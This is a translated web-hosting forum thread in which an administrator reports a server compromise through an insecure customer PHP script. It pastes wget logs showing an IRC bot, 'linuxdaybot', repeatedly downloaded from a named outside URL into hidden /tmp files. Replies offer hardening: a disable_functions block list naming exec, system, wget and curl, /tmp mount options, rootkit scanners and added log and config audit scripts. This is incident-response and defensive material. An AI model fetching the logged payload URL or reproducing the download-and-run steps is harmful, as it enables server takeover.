Hack attack on server, Linuxdaybot, customer scripts - what to do?

All about the security of the system and the applications
shapeshift
Posts: 18
Joined: 2003-02-16 00:05

Hack attack on server, Linuxdaybot, customer scripts - what to do?

Post by shapeshift »

Hi,
presumably through an insecure customer script (mea culpa, I know; I think it was phpBB or a photo gallery), an attempt was made to install a bot and to abuse the server as a file dump:

Code:

--16:20:43--  http://www.precisa-se.com.br/curriculos/linuxday.txt
           => `/tmp/.aprVWpZP8'
Resolving www.precisa-se.com.br... 204.16.1.127
Connecting to www.precisa-se.com.br[204.16.1.127]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4,102 [text/plain]

    0K ....                                                  100%   31.25 KB/s

16:20:44 (31.25 KB/s) - `/tmp/.aprVWpZP8' saved [4102/4102]

--16:20:45--  http://www.precisa-se.com.br/curriculos/linuxday.txt
           => `/tmp/.aprVWpZP8'
Resolving www.precisa-se.com.br... 204.16.1.127
Connecting to www.precisa-se.com.br[204.16.1.127]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4,102 [text/plain]

    0K ....                                                  100%   29.47 KB/s

16:20:46 (29.47 KB/s) - `/tmp/.aprVWpZP8' saved [4102/4102]

--16:20:53--  http://www.precisa-se.com.br/curriculos/linuxdaybot.txt
           => `/tmp/.aprVWpZP9'
Resolving www.precisa-se.com.br... 204.16.1.127
Connecting to www.precisa-se.com.br[204.16.1.127]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,392 [text/plain]

    0K .......... ........                                   100%   73.97 KB/s

16:20:53 (73.97 KB/s) - `/tmp/.aprVWpZP9' saved [19392/19392]

--16:20:55--  http://www.precisa-se.com.br/curriculos/linuxdaybot.txt
           => `/tmp/.aprVWpZP9'
Resolving www.precisa-se.com.br... 204.16.1.127
Connecting to www.precisa-se.com.br[204.16.1.127]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,392 [text/plain]

    0K .......... ........                                   100%   69.38 KB/s

16:20:56 (69.38 KB/s) - `/tmp/.aprVWpZP9' saved [19392/19392]

--16:20:56--  http://www.precisa-se.com.br/curriculos/linuxdaybot.txt
           => `/tmp/.aprVWpZP9'
Resolving www.precisa-se.com.br... 204.16.1.127
Connecting to www.precisa-se.com.br[204.16.1.127]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,392 [text/plain]

    0K .......... ........                                   100%   73.09 KB/s

16:20:57 (73.09 KB/s) - `/tmp/.aprVWpZP9' saved [19392/19392]

--16:20:57--  http://www.precisa-se.com.br/curriculos/linuxdaybot.txt
           => `/tmp/.aprVWpZP9'
Resolving www.precisa-se.com.br... 204.16.1.127
Connecting to www.precisa-se.com.br[204.16.1.127]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,392 [text/plain]

    0K .......... ........                                   100%   72.72 KB/s

Code:

Connecting to www.precisa-se.com.br[204.16.1.127]:80... ......connected.
HTTP request sent, awaiting response... .. ........                                   100%   68.58 KB/s

16:56:16 (68.58 KB/s) - `/tmp/.aprVWpZP9' saved [19392/19392]

200 OK
Length: 19,392 [text/plain]

    0K ..syntax error at /tmp/.aprVWpZP9 line 103, at EOF
Missing right curly or square bracket at /tmp/.aprVWpZP9 line 103, at end of line
Execution of /tmp/.aprVWpZP9 aborted due to compilation errors.
......--16:56:17--  http://www.precisa-se.com.br/curriculos/linuxdaybot.txt
           => `/tmp/.aprVWpZP9'
Resolving www.precisa-se.com.br... 204.16.1.127
Connecting to www.precisa-se.com.br[204.16.1.127]:80... .. ........                                   100%   68.76 KB/s

16:56:17 (68.76 KB/s) - `/tmp/.aprVWpZP9' saved [19392/19392]

String found where operator expected at /tmp/.aprVWpZP9 line 3, near "devoice(""
  (Might be a runaway multi-line "" string starting on line 1)
	(Missing semicolon on previous line?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 3, near "devoice("$1"
String found where operator expected at /tmp/.aprVWpZP9 line 3, near "$1", ""
	(Missing operator before ", "?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 3, near "", "$2"
	(Missing operator before $2?)
String found where operator expected at /tmp/.aprVWpZP9 line 6, near "msg(""
  (Might be a runaway multi-line "" string starting on line 3)
	(Missing semicolon on previous line?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 6, near "msg("$1"
String found where operator expected at /tmp/.aprVWpZP9 line 6, near "$1", ""
	(Missing operator before ", "?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 6, near "", "$2"
	(Missing operator before $2?)
String found where operator expected at /tmp/.aprVWpZP9 line 10, near "msg(""
  (Might be a runaway multi-line "" string starting on line 6)
	(Missing semicolon on previous line?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 10, near "msg("$2"
String found where operator expected at /tmp/.aprVWpZP9 line 10, near "$2", ""
	(Missing operator before ", "?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 10, near "", "$3"
	(Missing operator before $3?)
String found where operator expected at /tmp/.aprVWpZP9 line 14, near "ctcp(""
  (Might be a runaway multi-line "" string starting on line 10)
	(Missing semicolon on previous line?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 14, near "ctcp("$1"
String found where operator expected at /tmp/.aprVWpZP9 line 14, near "$1", ""
	(Missing operator before ", "?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 14, near "", "$2"
	(Missing operator before $2?)
String found where operator expected at /tmp/.aprVWpZP9 line 18, near "ctcp(""
  (Might be a runaway multi-line "" string starting on line 14)
	(Missing semicolon on previous line?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 18, near "ctcp("$2"
String found where operator expected at /tmp/.aprVWpZP9 line 18, near "$2", ""
	(Missing operator before ", "?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 18, near "", "$3"
	(Missing operator before $3?)
String found where operator expected at /tmp/.aprVWpZP9 line 22, near "invite(""
  (Might be a runaway multi-line "" string starting on line 18)
	(Missing semicolon on previous line?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 22, near "invite("$1"
String found where operator expected at /tmp/.aprVWpZP9 line 22, near "$1", ""
	(Missing operator before ", "?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 22, near "", "$2"
	(Missing operator before $2?)
String found where operator expected at /tmp/.aprVWpZP9 line 25, near "nick(""
  (Might be a runaway multi-line "" string starting on line 22)
	(Missing semicolon on previous line?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 25, near "nick("$1"
String found where operator expected at /tmp/.aprVWpZP9 line 28, near "conectar(""
  (Might be a runaway multi-line "" string starting on line 25)
	(Missing semicolon on previous line?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 28, near "conectar("$2"
String found where operator expected at /tmp/.aprVWpZP9 line 28, near "$2", ""
	(Missing operator before ", "?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 28, near "", "$1"
	(Missing operator before $1?)
String found where operator expected at /tmp/.aprVWpZP9 line 31, near "DCC::SEND(""
  (Might be a runaway multi-line "" string starting on line 28)
	(Missing semicolon on previous line?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 31, near "DCC::SEND("$1"
String found where operator expected at /tmp/.aprVWpZP9 line 31, near "$1", ""
	(Missing operator before ", "?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 31, near "", "$2"
	(Missing operator before $2?)
String found where operator expected at /tmp/.aprVWpZP9 line 34, near "sendraw(""
  (Might be a runaway multi-line "" string starting on line 31)
	(Missing semicolon on previous line?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 34, near "sendraw("$1"
String found where operator expected at /tmp/.aprVWpZP9 line 37, near "eval ""
  (Might be a runaway multi-line "" string starting on line 34)
	(Missing semicolon on previous line?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 37, near "eval "$1"
	(Do you need to predeclare eval?)
String found where operator expected at /tmp/.aprVWpZP9 line 45, near "chdir(""
  (Might be a runaway multi-line "" string starting on line 37)
	(Missing semicolon on previous line?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 45, near "chdir("$1"
String found where operator expected at /tmp/.aprVWpZP9 line 45, near "$1") || msg(""
	(Missing operator before ") || msg("?)
Scalar found where operator expected at /tmp/.aprVWpZP9 line 45, near "") || msg("$printl"
	(Missing operator before $printl?)
String found where operator expected at /tmp/.aprVWpZP9 line 45, near "$printl", ""
	(Missing operator before ", "?)
Bareword found where operator expected at /tmp/.aprVWpZP9 line 45, near "", "Diert"
	(Missing operator before Diert?)
syntax error at /tmp/.aprVWpZP9 line 3, near "devoice(""
Unrecognized character xF3 at /tmp/.aprVWpZP9 line 45.
connected.
HTTP request sent, awaiting response... --16:56:17--  http://www.precisa-se.com.br/curriculos/linuxdaybot.txt
           => `/tmp/.aprVWpZP9'
Resolving www.precisa-se.com.br... 204.16.1.127
Connecting to www.precisa-se.com.br[204.16.1.127]:80... 200 OK
Length: 19,392 [text/plain]

    0K ..connected.
HTTP request sent, awaiting response... ......200 OK
Length: 19,392 [text/plain]

    0K .... ........                                   100%   72.11 KB/s

16:56:17 (72.11 KB/s) - `/tmp/.aprVWpZP9' saved [19392/19392]

......syntax error at /tmp/.aprVWpZP9 line 103, next token ???
syntax error at /tmp/.aprVWpZP9 line 103, near "@adms) "
Execution of /tmp/.aprVWpZP9 aborted due to compilation errors.
.. ........                                   100%   73.01 KB/s

16:56:17 (73.01 KB/s) - `/tmp/.aprVWpZP9' saved [19392/19392]

--16:56:18--  http://www.precisa-se.com.br/curriculos/linuxdaybot.txt
           => `/tmp/.aprVWpZP9'
Resolving www.precisa-se.com.br... 204.16.1.127
Connecting to www.precisa-se.com.br[204.16.1.127]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,392 [text/plain]

    0K .......... ........                                   100%   71.84 KB/s

16:56:18 (71.84 KB/s) - `/tmp/.aprVWpZP9' saved [19392/19392]


PHP safe mode is enabled for the customer.
In addition, there was a 15 MB RAR file in the customer's directory that has no business being there, but I haven't been able to reach the customer yet to ask whether he uploaded it (according to the transfer log it was uploaded via FTP by this user).

Since my admin is on vacation, I've done the following so far with my basic knowledge:

- updated the insecure script
- php.ini allow_url_fopen = Off
- secured the logs
- looked for suspicious processes (found nothing)
- searched for other large files (found nothing)
- checked the tmp directories (nothing there that doesn't belong)
- put the server into rescue mode
- changed the passwords

How exactly was the user able to place the files on the server,
i.e. how did he gain access?

What else can I do right now? Where can I see how, and to what extent, he actually gained access and installed the bot?

Since I have to use Confixx for some customers (they want to manage email/WebFTP etc. themselves), I'll have to apply all patches by hand after the reinstall. I'd like to update to PHP 4.4.X; how do I go about that? YaST doesn't directly offer any "real" updates (online update apparently only does bug fixing??)

The system will be reinstalled together with the admin in a few days; what else should I keep in mind when doing so?

Thanks!
aubergine
Posts: 471
Joined: 2005-09-10 17:52
Location: Frankfurt am Main

Re: Hack attack on server, Linuxdaybot, customer scripts - what to do?

Post by aubergine »

http://www.rootforum.org/forum/viewtopic.php?t=38263

Here is a very similar topic
shapeshift
Posts: 18
Joined: 2003-02-16 00:05

Re: Hack attack on server, Linuxdaybot, customer scripts - what to do?

Post by shapeshift »

Yes, thanks, I've already looked at it. I'll probably go with mod_security + rules.
I'd still be interested in the path of the unauthorized access to my server (where can I possibly see which security hole was exploited and how, and what exactly was done, insofar as that can still be traced).
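One way to look for the entry point in the web server logs, as an added example that is not code from this thread: the script below parses Apache combined-format access log lines and flags requests whose query-string parameters carry a remote URL, the typical trace of a remote file inclusion through a PHP script that fetches URLs while allow_url_fopen is on (the wget output in the first post is what such an inclusion produces server-side). The log lines are constructed samples with placeholder IPs and hostnames; legitimate redirect parameters show up too and need manual triage.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed sample lines in Apache "combined" format (placeholder IPs and hosts,
# not data from the original thread). Line 3 carries a URL-encoded remote URL.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2006:16:20:41 +0100] "GET /gallery/index.php?page=http://example.invalid/cmd.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.9 - - [10/Mar/2006:16:20:45 +0100] "GET /forum/viewtopic.php?t=42 HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2006:16:20:50 +0100] "GET /forum/include.php?file=http%3A%2F%2Fexample.invalid%2Flinuxday.txt%3F HTTP/1.1" 200 73 "-" "Wget/1.9"
192.0.2.5 - - [10/Mar/2006:16:22:11 +0100] "GET /index.php?redirect=http://www.example.org/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) '
)
REMOTE_SCHEME = re.compile(r'^(https?|ftp)://', re.IGNORECASE)

def find_remote_includes(log_text):
    """Return one record per request whose query string contains a remote URL."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or "?" not in m.group("target"):
            continue
        script, query = m.group("target").split("?", 1)
        # Decode once more than the parser does so double-encoded URLs are caught too.
        for name, value in parse_qsl(unquote(query), keep_blank_values=True):
            if REMOTE_SCHEME.match(value.strip()):
                hits.append({"ip": m.group("ip"), "time": m.group("ts"),
                             "script": script, "param": name, "url": value,
                             "status": int(m.group("status"))})
    return hits

def count_by_ip(hits):
    """Requests with remote URLs per client address, to spot the scanning host."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts

if __name__ == "__main__":
    for h in find_remote_includes(SAMPLE_LOG):
        print(f'{h["time"]} {h["ip"]} {h["script"]} {h["param"]}={h["url"]} ({h["status"]})')
    print(count_by_ip(find_remote_includes(SAMPLE_LOG)))
```

On a real host, feed it the vhost's access_log for the time window of the wget output above; the script name and parameter in the hit tell you which customer script to patch.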
lord_pinhead
Posts: 774
Joined: 2004-04-26 15:57

Re: Hack attack on server, Linuxdaybot, customer scripts - what to do?

Post by lord_pinhead »

If safe mode was active and you are also using the disabled functions, nothing should be able to happen there

php.ini

Code:

disable_functions = exec,passthru,proc_close,proc_get_status,proc_nice,proc_open,proc_terminate,shell_exec,system,set_time_limit,apache_note,apache_setenv,closelog,debugger_off,debugger_on,define_syslog_variables,openlog,syslog,popen,pclose,wget,curl,puf

What I would also do is set the right mount options in fstab, then at least /tmp isn't left bare. Run rkhunter and chkrootkit; maybe the attacker was able to replace certain binaries. ps, netstat, find etc. are popular targets for replacement.
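An added example, not code from this thread, that checks the settings discussed above: it parses a php.ini and a /proc/mounts listing and reports whether allow_url_fopen is on, whether safe_mode is off, which process-execution functions are missing from disable_functions, and which of noexec/nosuid/nodev are missing on /tmp. The inputs are constructed samples; on a real host read the distribution's php.ini and /proc/mounts instead.

```python
# Process-execution functions from the list above; the baseline the audit checks for.
EXEC_FUNCTIONS = {"exec", "passthru", "proc_open", "shell_exec", "system", "popen"}
TMP_OPTIONS = {"noexec", "nosuid", "nodev"}

# Constructed sample inputs (not taken from the original thread).
SAMPLE_PHP_INI = """\
[PHP]
allow_url_fopen = On   ; remote URLs still allowed for fopen()/include()
safe_mode = Off
disable_functions = exec, system
"""
SAMPLE_MOUNTS = """\
/dev/sda2 / ext3 rw,errors=remount-ro 0 0
/dev/sda5 /tmp ext3 rw 0 0
"""

def parse_php_ini(text):
    """Minimal key=value parser: drops ';' comments, [sections] and quotes."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if "=" in line and not line.startswith("["):
            key, value = line.split("=", 1)
            settings[key.strip().lower()] = value.strip().strip('"')
    return settings

def ini_on(value):
    """php.ini boolean: 1/On/True/Yes are true, everything else false."""
    return value.strip().lower() in ("1", "on", "true", "yes")

def audit_php_ini(text):
    s = parse_php_ini(text)
    findings = []
    if ini_on(s.get("allow_url_fopen", "On")):   # PHP's default is On
        findings.append("allow_url_fopen enabled: include/fopen can fetch remote URLs")
    if not ini_on(s.get("safe_mode", "Off")):
        findings.append("safe_mode off")
    disabled = {f.strip() for f in s.get("disable_functions", "").split(",")}
    missing = sorted(EXEC_FUNCTIONS - disabled)
    if missing:
        findings.append("disable_functions lacks: " + ", ".join(missing))
    return findings

def audit_mount(mounts_text, path="/tmp"):
    """Hardening options missing on `path` (from /proc/mounts), or a note if it is no mount."""
    for line in mounts_text.splitlines():
        fields = line.split()
        if len(fields) >= 4 and fields[1] == path:
            return sorted(TMP_OPTIONS - set(fields[3].split(",")))
    return [f"{path} is not a separate mount point"]
```

Mount options only take effect after the corresponding fstab entry is remounted, so run the mount check after `mount -o remount /tmp`, not just after editing fstab.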
shapeshift
Posts: 18
Joined: 2003-02-16 00:05

Re: Hack attack on server, Linuxdaybot, customer scripts - what to do?

Post by shapeshift »

Yes, I've since adjusted php.ini / disable_functions in the meantime, but I'll add the functions you listed as well; I had fewer. Thanks!

I'll set the mount options too. I need to read up on that more thoroughly anyway, so that I can make changes myself, and safely, even without the admin.

Oh, and the 15 MB file was the customer's, so the attacker only had access to the TMP directory.